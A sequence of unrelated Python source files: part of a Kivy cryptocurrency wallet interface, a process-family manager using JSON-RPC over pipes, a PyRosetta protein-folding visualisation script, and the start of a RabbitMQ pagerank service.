info_bubble._modal_view)
if not arrow_pos:
info_bubble.show_arrow = False
else:
info_bubble.show_arrow = True
info_bubble.arrow_pos = arrow_pos
img = info_bubble.ids.img
if text == 'texture':
# icon holds a texture not a source image
# display the texture in full screen
text = ''
img.texture = icon
info_bubble.fs = True
info_bubble.show_arrow = False
img.allow_stretch = True
info_bubble.dim_background = True
info_bubble.background_image = 'atlas://gui/kivy/theming/light/card'
else:
info_bubble.fs = False
info_bubble.icon = icon
#if img.texture and img._coreimage:
# img.reload()
img.allow_stretch = False
info_bubble.dim_background = False
info_bubble.background_image = 'atlas://data/images/defaulttheme/bubble'
info_bubble.message = text
if not pos:
pos = (win.center[0], win.center[1] - (info_bubble.height/2))
info_bubble.show(pos, duration, width, modal=modal, exit=exit)
def tx_dialog(self, tx):
from .uix.dialogs.tx_dialog import TxDialog
d = TxDialog(self, tx)
d.open()
def sign_tx(self, *args):
threading.Thread(target=self._sign_tx, args=args).start()
def _sign_tx(self, tx, password, on_success, on_failure):
try:
self.wallet.sign_transaction(tx, password)
except InvalidPassword:
Clock.schedule_once(lambda dt: on_failure(_("Invalid PIN")))
return
Clock.schedule_once(lambda dt: on_success(tx))
def _broadcast_thread(self, tx, on_complete):
ok, txid = self.network.broadcast(tx)
Clock.schedule_once(lambda dt: on_complete(ok, txid))
def broadcast(self, tx, pr=None):
def on_complete(ok, msg):
if ok:
self.show_info(_('Payment sent.'))
if self.send_screen:
self.send_screen.do_clear()
if pr:
self.wallet.invoices.set_paid(pr, tx.txid())
self.wallet.invoices.save()
self.update_tab('invoices')
else:
self.show_error(msg)
if self.network and self.network.is_connected():
self.show_info(_('Sending'))
threading.Thread(target=self._broadcast_thread, args=(tx, on_complete)).start()
else:
self.show_info(_('Cannot broadcast transaction') + ':\n' + _('Not connected'))
def description_dialog(self, screen):
from .uix.dialogs.label_dialog import LabelDialog
text = screen.message
def callback(text):
screen.message = text
d = LabelDialog(_('Enter description'), text, callback)
d.open()
@profiler
def amount_dialog(self, screen, show_max):
from .uix.dialogs.amount_dialog import AmountDialog
amount = screen.amount
if amount:
amount, u = str(amount).split()
assert u == self.base_unit
def cb(amount):
screen.amount = amount
popup = AmountDialog(show_max, amount, cb)
popup.open()
def protected(self, msg, f, args):
if self.wallet.has_password():
self.password_dialog(msg, f, args)
else:
f(*(args + (None,)))
def delete_wallet(self):
from .uix.dialogs.question import Question
basename = os.path.basename(self.wallet.storage.path)
d = Question(_('Delete wallet?') + '\n' + basename, self._delete_wallet)
d.open()
def _delete_wallet(self, b):
if b:
basename = os.path.basename(self.wallet.storage.path)
self.protected(_("Enter your PIN code to confirm deletion of %s") % basename, self.__delete_wallet, ())
def __delete_wallet(self, pw):
wallet_path = self.get_wallet_path()
dirname = os.path.dirname(wallet_path)
basename = os.path.basename(wallet_path)
if self.wallet.has_password():
try:
self.wallet.check_password(pw)
except:
self.show_error("Invalid PIN")
return
self.stop_wallet()
os.unlink(wallet_path)
self.show_error("Wallet removed:" + basename)
d = os.listdir(dirname)
name = 'default_wallet'
new_path = os.path.join(dirname, name)
self.load_wallet_by_name(new_path)
def show_seed(self, label):
self.protected(_("Enter your PIN code in order to decrypt your seed"), self._show_seed, (label,))
def _show_seed(self, label, password):
if self.wallet.has_password() and password is None:
return
keystore = self.wallet.keystore
try:
seed = keystore.get_seed(password)
passphrase = keystore.get_passphrase(password)
except:
self.show_error("Invalid PIN")
return
label.text = _('Seed') + ':\n' + seed
if passphrase:
label.text += '\n\n' + _('Passphrase') + ': ' + passphrase
def change_password(self, cb):
if self.wallet.has_password():
self.protected(_("Changing PIN code.") + '\n' + _("Enter your current PIN:"), self._change_password, (cb,))
else:
self._change_password(cb, None)
def _change_password(self, cb, old_password):
if self.wallet.has_password():
if old_password is None:
return
try:
self.wallet.check_password(old_password)
except InvalidPassword:
self.show_error("Invalid PIN")
return
self.password_dialog(_('Enter new PIN'), self._change_password2, (cb, old_password,))
def _change_password2(self, cb, old_password, new_password):
self.password_dialog(_('Confirm new PIN'), self._change_password3, (cb, old_password, new_password))
def _change_password3(self, cb, old_password, new_password, confirmed_password):
if new_password == confirmed_password:
self.wallet.update_password(old_password, new_password)
cb()
else:
self.show_error("PIN numbers do not match")
def password_dialog(self, msg, f, args):
from .uix.dialogs.password_dialog import PasswordDialog
def callback(pw):
Clock.schedule_once(lambda x: f(*(args + (pw,))), 0.1)
if self._password_dialog is None:
self._password_dialog = PasswordDialog()
self._password_dialog.init(msg, callback)
self._password_dialog.open()
def export_private_keys(self, pk_label, addr):
def show_private_key(addr, pk_label, password):
if self.wallet.has_password() and password is None:
return
key = str(self.wallet.export_private_key(addr, password)[0])
pk_label.data = key
self.protected(_("Enter your PIN code in order to decrypt your private key"), show_private_key, (addr, pk_label))
|
__init__.py
|
# -*- coding: utf-8 -*-
__author__ = 'matth'
import threading
import traceback
import sys
import subprocess
import time
import uuid
import logging
import json
import argparse
import shlex
import os
import jsonrpc
import Queue
import pkgutil
from processfamily.threads import stop_threads
from processfamily.processes import kill_process, set_processor_affinity, cpu_count
import signal
import functools
if sys.platform.startswith('win'):
import win32job
import win32api
import win32security
from processfamily import win32Popen
else:
import prctl
logger = logging.getLogger("processfamily")
def start_child_process(child_process_instance):
host = _ChildProcessHost(child_process_instance)
host.run()
def _traceback_str():
exc_info = sys.exc_info()
return "".join(traceback.format_exception(exc_info[0], exc_info[1], exc_info[2]))
def _exception_str():
exc_info = sys.exc_info()
return "".join(traceback.format_exception_only(exc_info[0], exc_info[1]))
class ChildProcess(object):
"""
Subclass this for the implementation of the child process. You must also include an appropriate main entry point.
You should do something like this in your implementation:
if __name__ == '__main__':
start_child_process(MyChildProcess())
"""
def init(self):
"""
Do any initialisation. The parent will wait for this to be complete before considering the process to be
running.
"""
def run(self):
"""
Method representing the thread's activity. You may override this method in a subclass.
This will be called from the processes main method, after initialising some other stuff.
"""
def stop(self, timeout=None):
"""
Will be called from a new thread. The process should do its best to shutdown cleanly if this is called.
:param timeout: The number of milliseconds that the parent process will wait before killing this process.
"""
class _ArgumentParser(argparse.ArgumentParser):
def exit(self, status=0, message=None):
pass
def error(self, message):
raise ValueError(message)
class _ChildProcessHost(object):
def __init__(self, child_process):
self.child_process = child_process
self.command_arg_parser = _ArgumentParser(description='Execute an RPC method on the child')
self.command_arg_parser.add_argument('method')
self.command_arg_parser.add_argument('--id', '-i', dest='json_rpc_id')
self.command_arg_parser.add_argument('--params', '-p', dest='params')
self._started_event = threading.Event()
self._stopped_event = threading.Event()
self.dispatcher = jsonrpc.Dispatcher()
self.dispatcher["stop"] = self._respond_immediately_for_stop
self.dispatcher["wait_for_start"] = self._wait_for_start
self.stdin = sys.stdin
sys.stdin = open(os.devnull, 'r')
self.stdout = sys.stdout
sys.stdout = open(os.devnull, 'w')
self._stdout_lock = threading.RLock()
self._sys_in_thread = threading.Thread(target=self._sys_in_thread_target)
self._sys_in_thread.setDaemon(True)
self._should_stop = False
def run(self):
#This is in the main thread
try:
self._sys_in_thread.start()
try:
if self._should_stop:
return
self.child_process.init()
finally:
self._started_event.set()
if self._should_stop:
return
self.child_process.run()
except Exception as e:
logger.error("Error: %s\n%s", e, _traceback_str())
raise
finally:
self._stopped_event.set()
def _wait_for_start(self):
self._started_event.wait()
return 0
def _sys_in_thread_target(self):
should_continue = True
while should_continue:
try:
line = self.stdin.readline()
if not line:
should_continue = False
else:
try:
should_continue = self._handle_command_line(line)
except Exception as e:
logger.error("Error handling processfamily command on input: %s\n%s", e, _traceback_str())
except Exception as e:
logger.error("Exception reading input for processfamily: %s\n%s", e, _traceback_str())
# This is a bit ugly, but I'm not sure what kind of error could cause this exception to occur,
# so it might get in to a tight loop which I want to avoid
time.sleep(5)
self._should_stop = True
self._started_event.wait(1)
threading.Thread(target=self._stop_thread_target).start()
self._stopped_event.wait(3)
#Give it ten seconds to stop
#This will not actually stop the process from terminating as this is a daemon thread
time.sleep(10)
#Now try and force things
stop_threads()
def _stop_thread_target(self):
try:
self.child_process.stop()
except Exception as e:
logger.error("Error handling processfamily stop command: %s\n%s", e, _traceback_str())
def _respond_immediately_for_stop(self):
logger.info("Received stop instruction from parent process")
self._should_stop = True
return 0
def _send_response(self, rsp):
if rsp:
if '\n' in rsp:
raise ValueError('Invalid response string (new lines are not allowed): "%r"' % rsp)
with self._stdout_lock:
logger.debug("Sending response: %s", rsp)
self.stdout.write("%s\n"%rsp)
self.stdout.flush()
def _handle_command_line(self, line):
try:
line = line.strip()
if not line.startswith('{'):
args = self.command_arg_parser.parse_args(shlex.split(line))
request = {
'jsonrpc': '2.0',
'method': args.method,
}
if args.json_rpc_id:
request['id'] = args.json_rpc_id
if args.params:
request['params'] = args.params
line = json.dumps(request)
else:
request = json.loads(line)
request_id = json.dumps(request.get("id"))
except Exception as e:
logger.error("Error parsing command string: %s\n%s", e, _traceback_str())
self._send_response('{"jsonrpc": "2.0", "error": {"code": -32700, "message": "Parse error"}, "id": null}')
return True
if request.get('method') == 'stop':
#I have to process the stop method in this thread!
#This is a bit lame - but I'm just using this to form a valid response and send it immediately
#
self._dispatch_rpc_call(line, request_id)
return False
else:
#Others should be processed from a new thread:
threading.Thread(target=self._dispatch_rpc_call_thread_target, args=(line, request_id)).start()
return True
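# Example command lines accepted on stdin (illustrative):
#   stop --id 1
#       -> {"jsonrpc": "2.0", "method": "stop", "id": "1"}
#   {"jsonrpc": "2.0", "method": "wait_for_start", "id": "2"}
# Lines starting with '{' are treated as raw JSON-RPC requests; anything else
# is parsed with the shell-style argument parser defined in __init__.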
def _dispatch_rpc_call(self, line, request_id):
try:
rsp = jsonrpc.JSONRPCResponseManager.handle(line, self.dispatcher)
if rsp is not None:
self._send_response(rsp.json)
except Exception as e:
logger.error("Error handling command string: %s\n%s", e, _traceback_str())
self._send_response('{"jsonrpc": "2.0", "error": {"code": 32603, "message": "Error handling request"}, "id": %s}'%request_id)
def _dispatch_rpc_call_thread_target(self, line, request_id):
try:
self._dispatch_rpc_call(line, request_id)
except Exception as e:
logger.error("Error handling command string: %s\n%s", e, _traceback_str())
class _ChildProcessProxy(object):
"""
A proxy to the child process that can be used from the parent process
"""
def __init__(self, process_instance, echo_std_err, child_index, process_family):
self.process_family = process_family
self.child_index = child_index
self.comms_strategy = process_family.CHILD_COMMS_STRATEGY
self.name = self.process_family.get_child_name(child_index)
self._process_instance = process_instance
self._rsp_queues_lock = threading.RLock()
self._rsp_queues = {}
self._stdin_lock = threading.RLock()
self.echo_std_err = echo_std_err
if self.echo_std_err:
self._sys_err_thread = threading.Thread(target=self._sys_err_thread_target)
self._sys_err_thread.start()
if self.comms_strategy:
self._sys_out_thread = threading.Thread(target=self._sys_out_thread_target)
self._sys_out_thread.start()
def send_command(self, command, timeout, params=None):
response_id = str(uuid.uuid4())
try:
self._send_command_req(response_id, command, params=params)
return self._wait_for_response(response_id, timeout)
finally:
self._cleanup_queue(response_id)
def _send_command_req(self, response_id, command, params=None):
with self._rsp_queues_lock:
if self._rsp_queues is None:
return
self._rsp_queues[response_id] = Queue.Queue()
cmd = {
"method": command,
"id": response_id,
"jsonrpc": "2.0"
}
if params is not None:
cmd["params"] = params
req = json.dumps(cmd)
if '\n' in req:
raise ValueError('Invalid request string (new lines are not allowed): "%r"' % req)
try:
with self._stdin_lock:
self._process_instance.stdin.write("%s\n" % req)
self._process_instance.stdin.flush()
if command == 'stop':
#Now close the stream - we are done
self._process_instance.stdin.close()
except Exception as e:
if self._process_instance.poll() is None:
#The process is running, so something is wrong:
raise
def _wait_for_response(self, response_id, timeout):
with self._rsp_queues_lock:
if self._rsp_queues is None:
return None
q = self._rsp_queues.get(response_id, None)
if q is None:
return None
try:
if timeout <= 0:
return q.get_nowait()
else:
return q.get(True, timeout)
except Queue.Empty as e:
return None
def _cleanup_queue(self, response_id):
with self._rsp_queues_lock:
if self._rsp_queues is not None:
self._rsp_queues.pop(response_id, None)
def _sys_err_thread_target(self):
while True:
try:
line = self._process_instance.stderr.readline()
if not line:
break
try:
self.process_family.handle_sys_err_line(self.child_index, line)
except Exception as e:
logger.error("Error handling %s stderr output: %s\n%s", self.name, e, _traceback_str())
except Exception as e:
logger.error("Exception reading stderr output for %s: %s\n%s", self.name, e, _traceback_str())
# This is a bit ugly, but I'm not sure what kind of error could cause this exception to occur,
# so it might get in to a tight loop which I want to avoid
time.sleep(5)
logger.debug("Subprocess stderr closed")
def _sys_out_thread_target(self):
try:
while True:
try:
line = self._process_instance.stdout.readline()
if not line:
break
try:
if self.comms_strategy == CHILD_COMMS_STRATEGY_PROCESSFAMILY_RPC_PROTOCOL:
self._handle_response_line(line)
else:
self.process_family.handle_sys_out_line(line)
except Exception as e:
logger.error("Error handling %s stdout output: %s\n%s", self.name, e, _traceback_str())
except Exception as e:
logger.error("Exception reading stdout output for %s: %s\n%s", self.name, e, _traceback_str())
# This is a bit ugly, but I'm not sure what kind of error could cause this exception to occur,
# so it might get in to a tight loop which I want to avoid
time.sleep(5)
logger.debug("Subprocess stdout closed - expecting termination")
start_time = time.time()
while self._process_instance.poll() is None and time.time() - start_time < 5:
time.sleep(0.1)
if self.echo_std_err:
self._sys_err_thread.join(5)
if self._process_instance.poll() is None:
logger.error("Stdout stream closed for %s, but process is not terminated (PID:%s)", self.name, self._process_instance.pid)
else:
logger.info("%s terminated (return code: %d)", self.name, self._process_instance.returncode)
finally:
#Unstick any waiting command threads:
with self._rsp_queues_lock:
for q in self._rsp_queues.values():
if q.empty():
q.put_nowait(None)
self._rsp_queues = None
def _handle_response_line(self, line):
rsp = json.loads(line)
if "id" in rsp:
with self._rsp_queues_lock:
if self._rsp_queues is None:
return
rsp_queue = self._rsp_queues.get(rsp["id"], None)
if rsp_queue is not None:
rsp_queue.put_nowait(rsp)
#We need to keep the job handle in a global variable so that it can't go out of scope and result in our process
#being killed
_global_process_job_handle = None
CPU_AFFINITY_STRATEGY_NONE = 0
CPU_AFFINITY_STRATEGY_CHILDREN_ONLY = 1
CPU_AFFINITY_STRATEGY_PARENT_INCLUDED = 2
CHILD_COMMS_STRATEGY_NONE = 0
CHILD_COMMS_STRATEGY_PIPES_CLOSE = 1
CHILD_COMMS_STRATEGY_PROCESSFAMILY_RPC_PROTOCOL = 2
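# Comms strategies: NONE leaves the children without pipes; PIPES_CLOSE signals a stop
# by closing each child's stdin; PROCESSFAMILY_RPC_PROTOCOL exchanges line-delimited
# JSON-RPC messages over stdin/stdout via _ChildProcessProxy.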
class ProcessFamily(object):
"""
Manages the launching of a set of child processes
"""
ECHO_STD_ERR = False
CPU_AFFINITY_STRATEGY = CPU_AFFINITY_STRATEGY_PARENT_INCLUDED
CLOSE_FDS = True
WIN_PASS_HANDLES_OVER_COMMANDLINE = False
WIN_USE_JOB_OBJECT = True
LINUX_USE_PDEATHSIG = True
NEW_PROCESS_GROUP = True
CHILD_COMMS_STRATEGY = CHILD_COMMS_STRATEGY_PROCESSFAMILY_RPC_PROTOCOL
def __init__(self, child_process_module_name=None, number_of_child_processes=None, run_as_script=True):
self.child_process_module_name = child_process_module_name
self.run_as_script = run_as_script
if self.CPU_AFFINITY_STRATEGY:
self.cpu_count = cpu_count()
if number_of_child_processes:
self.number_of_child_processes = number_of_child_processes
elif self.CPU_AFFINITY_STRATEGY == CPU_AFFINITY_STRATEGY_PARENT_INCLUDED:
self.number_of_child_processes = self.cpu_count-1
else:
self.number_of_child_processes = self.cpu_count
self.child_processes = []
self._child_process_group_id = None
def get_child_process_cmd(self, child_number):
"""
:param child_number zero-indexed
"""
if self.run_as_script:
return [self.get_sys_executable(), self._find_module_filename(self.child_process_module_name)]
else:
return [self.get_sys_executable(), '-m', self.child_process_module_name]
def get_sys_executable(self):
return sys.executable
def get_job_object_name(self):
return "py_processfamily_%s" % (str(uuid.uuid4()))
def get_child_name(self, i):
return 'Child Process %d' % (i+1)
def handle_sys_err_line(self, child_index, line):
sys.stderr.write(line)
def handle_sys_out_line(self, child_index, line):
"""
This is only relevant if CHILD_COMMS_STRATEGY_PIPES_CLOSE is used
"""
pass
def _add_to_job_object(self):
global _global_process_job_handle
if _global_process_job_handle is not None:
#This means that we are creating another process family - we'll all be in the same job
return
if win32job.IsProcessInJob(win32api.GetCurrentProcess(), None):
raise ValueError("ProcessFamily relies on the parent process NOT being in a job already")
#Create a new job and put us in it before we create any children
logger.debug("Creating job object and adding parent process to it")
security_attrs = win32security.SECURITY_ATTRIBUTES()
security_attrs.bInheritHandle = 0
_global_process_job_handle = win32job.CreateJobObject(security_attrs, self.get_job_object_name())
extended_info = win32job.QueryInformationJobObject(_global_process_job_handle, win32job.JobObjectExtendedLimitInformation)
extended_info['BasicLimitInformation']['LimitFlags'] = win32job.JOB_OBJECT_LIMIT_KILL_ON_JOB_CLOSE
win32job.SetInformationJobObject(_global_process_job_handle, win32job.JobObjectExtendedLimitInformation, extended_info)
win32job.AssignProcessToJobObject(_global_process_job_handle, win32api.GetCurrentProcess())
logger.debug("Added to job object")
def get_Popen_kwargs(self, i, **kwargs):
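        # Platform-specific Popen keyword arguments: on Windows this optionally adds
        # CREATE_NEW_PROCESS_GROUP and a handle-duplication timeout for command-line handle
        # passing; on POSIX it installs a preexec_fn that sets the child's process group
        # and parent-death signal.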
if sys.platform.startswith('win'):
if self.WIN_PASS_HANDLES_OVER_COMMANDLINE:
kwargs['timeout_for_child_stream_duplication_event'] = None
if self.NEW_PROCESS_GROUP:
kwargs['creationflags'] = subprocess.CREATE_NEW_PROCESS_GROUP
return kwargs
else:
kwargs['preexec_fn'] = functools.partial(self.pre_exec_fn, i)
return kwargs
def get_Popen_class(self):
if sys.platform.startswith('win'):
if self.WIN_PASS_HANDLES_OVER_COMMANDLINE:
logger.debug("Using HandlesOverCommandLinePopen")
return win32Popen.HandlesOverCommandLinePopen
else:
logger.debug("Using ProcThreadAttributeHandleListPopen")
return win32Popen.ProcThreadAttributeHandleListPopen
else:
return subprocess.Popen
def pre_exec_fn(self, i):
#This is called after fork(), but before exec()
#Assign this new process to a new group
if self.NEW_PROCESS_GROUP:
os.setpgrp()
if self.LINUX_USE_PDEATHSIG:
prctl.set_pdeathsig(self.get_pdeath_sig())
def get_pdeath_sig(self):
return signal.SIGKILL
def set_parent_affinity_mask(self):
if self.CPU_AFFINITY_STRATEGY == CPU_AFFINITY_STRATEGY_PARENT_INCLUDED:
set_processor_affinity([0])
def set_child_affinity_mask(self, pid, child_index):
i = child_index+1 if self.CPU_AFFINITY_STRATEGY == CPU_AFFINITY_STRATEGY_PARENT_INCLUDED else child_index
set_processor_affinity([i%self.cpu_count], pid=pid)
def start(self, timeout=30):
if self.child_processes:
raise Exception("Invalid state: start() can only be called once")
s = time.time()
if self.CPU_AFFINITY_STRATEGY:
self.set_parent_affinity_mask()
if sys.platform.startswith('win') and self.WIN_USE_JOB_OBJECT:
self._add_to_job_object()
self.child_processes = []
for i in range(self.number_of_child_processes):
logger.info("Starting %s", self.get_child_name(i))
cmd = self.get_child_process_cmd(i)
logger.debug("Commandline for %s: %s", self.get_child_name(i), json.dumps(cmd))
p = self.get_Popen_class()(
cmd,
**self.get_Popen_kwargs(i,
stdin=subprocess.PIPE if self.CHILD_COMMS_STRATEGY else None,
stdout=subprocess.PIPE if self.CHILD_COMMS_STRATEGY else None,
stderr=(subprocess.PIPE if self.ECHO_STD_ERR else open(os.devnull, 'w')) if self.CHILD_COMMS_STRATEGY else None,
close_fds=self.CLOSE_FDS))
if self.CPU_AFFINITY_STRATEGY and p.poll() is None:
try:
self.set_child_affinity_mask(p.pid, i)
except Exception as e:
logger.error("Unable to set affinity for process %d: %s", p.pid, e)
self.child_processes.append(_ChildProcessProxy(p, self.ECHO_STD_ERR, i, self))
if sys.platform.startswith('win') and self.WIN_PASS_HANDLES_OVER_COMMANDLINE:
logger.debug("Waiting for child stream duplication events")
for c in self.child_processes:
c._process_instance.wait_for_child_stream_duplication_event(timeout=timeout-(time.time()-s)-3)
if self.CHILD_COMMS_STRATEGY == CHILD_COMMS_STRATEGY_PROCESSFAMILY_RPC_PROTOCOL:
logger.debug("Waiting for child start events")
responses = self.send_command_to_all("wait_for_start", timeout=timeout-(time.time()-s))
for i, r in enumerate(responses):
if r is None:
if self.child_processes[i]._process_instance.poll() is None:
logger.error(
"Timed out waiting for %s (PID %d) to complete initialisation",
self.get_child_name(i),
self.child_processes[i]._process_instance.pid)
else:
logger.error(
"%s terminated with response code %d before completing initialisation",
self.get_child_name(i),
self.child_processes[i]._process_instance.poll())
logger.info("All child processes initialised")
def stop(self, timeout=30, wait=True):
clean_timeout = timeout - 1
if self.CHILD_COMMS_STRATEGY:
if self.CHILD_COMMS_STRATEGY == CHILD_COMMS_STRATEGY_PROCESSFAMILY_RPC_PROTOCOL:
logger.info("Sending stop commands to child processes")
self.send_command_to_all("stop", timeout=clean_timeout)
elif self.CHILD_COMMS_STRATEGY == CHILD_COMMS_STRATEGY_PIPES_CLOSE:
logger.info("Closing input streams of child processes")
for p in list(self.child_processes):
try:
p._process_instance.stdin.close()
except Exception as e:
logger.warning("Failed to close child process input stream with PID %s: %s\n%s", p._process_instance.pid, e, _traceback_str())
if wait:
self.wait_for_stop_and_then_terminate()
def wait_for_stop_and_then_terminate(self, timeout=30):
clean_timeout = timeout - 1
start_time = time.time()
if self.CHILD_COMMS_STRATEGY:
logger.debug("Waiting for child processes to terminate")
self._wait_for_children_to_terminate(start_time, clean_timeout)
if self.child_processes:
#We've nearly run out of time - let's try and kill them:
logger.info("Attempting to kill child processes")
for p in list(self.child_processes):
try:
kill_process(p._process_instance.pid)
except Exception as e:
logger.warning("Failed to kill child process with PID %s: %s\n%s", p._process_instance.pid, e, _traceback_str())
self._wait_for_children_to_terminate(start_time, timeout)
def _wait_for_children_to_terminate(self, start_time, timeout):
first_run = True
while self.child_processes and (first_run or time.time() - start_time < timeout):
for p in list(self.child_processes):
if p._process_instance.poll() is not None:
self.child_processes.remove(p)
if first_run:
first_run = False
else:
time.sleep(0.1)
def send_command_to_all(self, command, timeout=30, params=None):
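        # Sends the same JSON-RPC request (one shared response id) to every child, then
        # collects each child's reply within whatever is left of the overall timeout budget.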
start_time = time.time()
response_id = str(uuid.uuid4())
responses = [None]*len(self.child_processes)
try:
for p in self.child_processes:
p._send_command_req(response_id, command, params=params)
for i, p in enumerate(self.child_processes):
time_left = timeout - (time.time() - start_time)
responses[i] = p._wait_for_response(response_id, time_left)
return responses
finally:
for p in self.child_processes:
p._cleanup_queue(response_id)
def _find_module_filename(self, modulename):
"""finds the filename of the module with the given name (supports submodules)"""
loader = pkgutil.find_loader(modulename)
if loader is None:
raise ImportError(modulename)
search_path = loader.get_filename(modulename)
return search_path
|
PyRosetta-PMV.py
|
# Eric Kim
# script to communicate between PyRosetta and PyMol
# run rosetta libraries and this script inside PyMol command-line window
# PyRosetta and PyMol must be built with matching Python versions
# March 2009
# (c) Copyright Rosetta Commons Member Institutions.
# (c) This file is part of the Rosetta software suite and is made available under license.
# (c) The Rosetta software is developed by the contributing members of the Rosetta Commons.
# (c) For more information, see http://www.rosettacommons.org. Questions about this can be
# (c) addressed to University of Washington UW TechTransfer, email: license@u.washington.edu.
# adapted to PMV and Blender by L.AUTIN
#stable version 3/31/2010
#for embedded version:
#c4d execfile("/Library/MGLTools/1.5.6/MGLToolsPckgs/mglutil/hostappli/PyRosetta-PMV.py")
#blender or ipython: run PyRosetta-PMV.py
#for regular version of pmv comment line 21
#import mglutil.hostappli.pdb_c4d as epmv
import sys,os
MGL_ROOT=os.environ['MGL_ROOT']
sys.path[0]=(MGL_ROOT+'lib/python2.5/site-packages')
sys.path.append(MGL_ROOT+'lib/python2.5/site-packages/PIL')
sys.path.append(MGL_ROOT+'/MGLToolsPckgs')
from Pmv.moleculeViewer import EditAtomsEvent
import time
from mglutil import hostappli
####################blender specific###################
import Pmv.hostappInterface.pdb_blender as epmv
import Blender
from Blender import Window, Scene, Draw
self=epmv.start(debug=1)
sc=Blender.Scene.GetCurrent()
#########################################################
plugDir=hostappli.__path__[0]
with_pmv = True
rConf=1
pmv_state = 1
nDecoys=5
def pmv_show(pose,self):
from Pmv.moleculeViewer import EditAtomsEvent
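    # Pushes the Cartesian coordinates of every atom in the Rosetta pose onto the matching
    # PMV atoms (conformation 1), then asks Blender/ePMV to redraw the updated model.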
global pmv_state
import time
#if not with_pmv: return
model = self.getMolFromName("test")
model.allAtoms.setConformation(1)
coord = {}
print pose.n_residue(),len(model.chains.residues)
for resi in range(1, pose.n_residue()+1):
res = pose.residue(resi)
resn = pose.pdb_info().number(resi)
#print resi,res.natoms(),len(model.chains.residues[resi-1].atoms)
k=0
for atomi in range(1, res.natoms()+1):
name = res.atom_name(atomi).strip()
if name != 'NV' :
a=model.chains.residues[resi-1].atoms[k]
pmv_name=a.name
k = k + 1
if name != pmv_name :
if name[1:] != pmv_name[:-1]:
print name,pmv_name
else :
coord[(resn, pmv_name)] = res.atom(atomi).xyz()
cood=res.atom(atomi).xyz()
a._coords[1]=[cood.x,cood.y,cood.z]
else :
coord[(resn, name)] = res.atom(atomi).xyz()
cood=res.atom(atomi).xyz()
a._coords[1]=[cood.x,cood.y,cood.z] #return coord
event = EditAtomsEvent('coords', model.allAtoms)
self.dispatchEvent(event)
#modEvent = ModificationEvent('edit','coords', mol.allAtoms)
#mol.geomContainer.updateGeoms(modEvent)
#PMV
#self.GUI.VIEWER.Redraw()
#time.sleep(.1)
#Blender
epmv.insertKeys(model.geomContainer.geoms['cpk'],1)
epmv.getCurrentScene().update()
Draw.Redraw()
Draw.Redraw(1)
Blender.Redraw()
def pmv_load(f):
if not with_pmv: return
mol=self.getMolFromName("test")
if mol is None :
self.readMolecule(f)
mol=self.Mols[0]
for i in range(nDecoys):
mol.allAtoms.addConformation(mol.allAtoms.coords[:])
#mol.name="tset"
print mol.name
#self.displaySticksAndBalls("test",log=1)
self.displayCPK("test:::",log=1)
self.colorAtomsUsingDG("test",log=1)
#cmd.show("cartoon", "decoy")
from rosetta import *
rosetta.init()
pose = Pose(plugDir+"/data/test_fragments.pdb")
dump_pdb(pose, plugDir+"/data/test.pdb")
pmv_load(plugDir+"/data/test.pdb")
pmv_show(pose,self)
scorefxn = core.scoring.ScoreFunction()
scorefxn.set_weight(core.scoring.fa_atr, 1.0)
scorefxn.set_weight(core.scoring.fa_rep, 1.0)
scorefxn.set_weight(core.scoring.hbond_sr_bb, 1.0)
scorefxn.set_weight(core.scoring.hbond_lr_bb, 1.0)
scorefxn.set_weight(core.scoring.hbond_bb_sc, 1.0)
scorefxn.set_weight(core.scoring.hbond_sc, 1.0)
#switch = SwitchResidueTypeSetMover("centroid")
#switch.apply(pose)
#scorefxn = create_score_function("score3")
import random, math, time
def perturb(new_pose,pose):
import random, math, time
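    # Pick one residue (1-10) at random and nudge either its phi or psi backbone torsion
    # by a Gaussian step with a 25-degree standard deviation.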
res = random.randrange(1,11)
if random.randrange(0,2)==0:
new_pose.set_phi(res, pose.phi(res)+random.gauss(0, 25))
else:
new_pose.set_psi(res, pose.psi(res)+random.gauss(0, 25))
from rosetta.core.fragment import *
fragset = core.fragment.ConstantLengthFragSet(3)
fragset.read_fragment_file(plugDir+"/data/test3_fragments")
movemap = core.kinematics.MoveMap()
movemap.set_bb(True)
mover_3mer = ClassicFragmentMover(fragset,movemap)
log = open("log", 'w')
def fold(pose,self,scorefxn,perturb,mover_3mer,pmv_show):
import random, math, time
kt = 1
print "ok Fold"
low_pose = Pose()
low_score = scorefxn(pose)
new_pose = Pose()
maxit = 1000
start_time = time.time()
stat = {"E":0,"A":0,"R":0}
for it in range(0, maxit):
print "in the loop"
if it==maxit/2: pose.assign(low_pose)
score = scorefxn(pose)
new_pose.assign(pose)
if it<maxit/2: mover_3mer.apply(new_pose)
else: perturb(new_pose,pose)
new_score = scorefxn(new_pose)
delE = new_score-score
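        # Metropolis criterion: always keep moves that lower the score; otherwise accept
        # with probability exp(-delE/kt), else reject and stay with the current pose.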
if delE<0:
score = new_score
pose.assign(new_pose)
action = "E"
else:
if random.random()<math.exp(-delE/kt):
score = new_score
pose.assign(new_pose)
action = "A"
else: action = "R"
if score<low_score:
low_score = score
low_pose.assign(pose)
print it,"\t",score,"\t",low_score,"\t",action
#log.write(str(score)+"\t"+str(low_score)+"\t"+str(action)+"\n")
stat[action] += 1
        if action != "R": pmv_show(pose,self)
duration = time.time()-start_time
print "took ",duration,"s\t",duration/float(maxit),"s/it"
#print "E:",stat["E"]/float(maxit),"\t","A:",stat["A"]/float(maxit),"\t","R:",stat["R"]/float(maxit)
print low_score
pmv_show(low_pose,self)
return low_pose
def angle(a):
return math.fmod(a,180)
"""
for i in range(0, 1):
pose2 = Pose()
pose2.assign(pose)
low_pose = fold(pose2)
print i,
for i in range(1,11):
log.write(str(angle(low_pose.phi(i)))+"\t"+str(angle(low_pose.psi(i)))+"\n")
import threading
def run(self):
thread = threading.Thread(target=fold, args=(pose,self,scorefxn,perturb,mover_3mer,pmv_show))
thread.setDaemon(1)
thread.start()
"""
import time
time.sleep(1.)
#fold(pose,self)
#import thread
#thread.start_new(fold, (pose,self))
#run(self)
fold(pose,self,scorefxn,perturb,mover_3mer,pmv_show)
|
pagerank.py
|
import os
import sys
import pika
import time
import struct
import platform
import threading
import warnings
import flatbuffers
from functools import partial
from datetime import timedelta
warnings.filterwarnings('ignore', category=RuntimeWarning)
from loguru import logger
from sparqlforhumans.PageRankItem import PageRankItemT
from sparqlforhumans.PageRankResponse import PageRankResponseT
from graph_tool.all import Graph, pagerank
class ProgramOptions:
amp_host = 'amqp://guest:guest@rabbitmq/?connection_attempts=10'
ids_queue = 'id-pairs-pagerank'
request_queue = 'request-pagerank'
response_queue = 'response-pagerank'
class ReconnectionException(Exception):
pass
class BinaryStorage:
def __init__(self, path, read_only=False) -> None:
self.__b = bytearray()
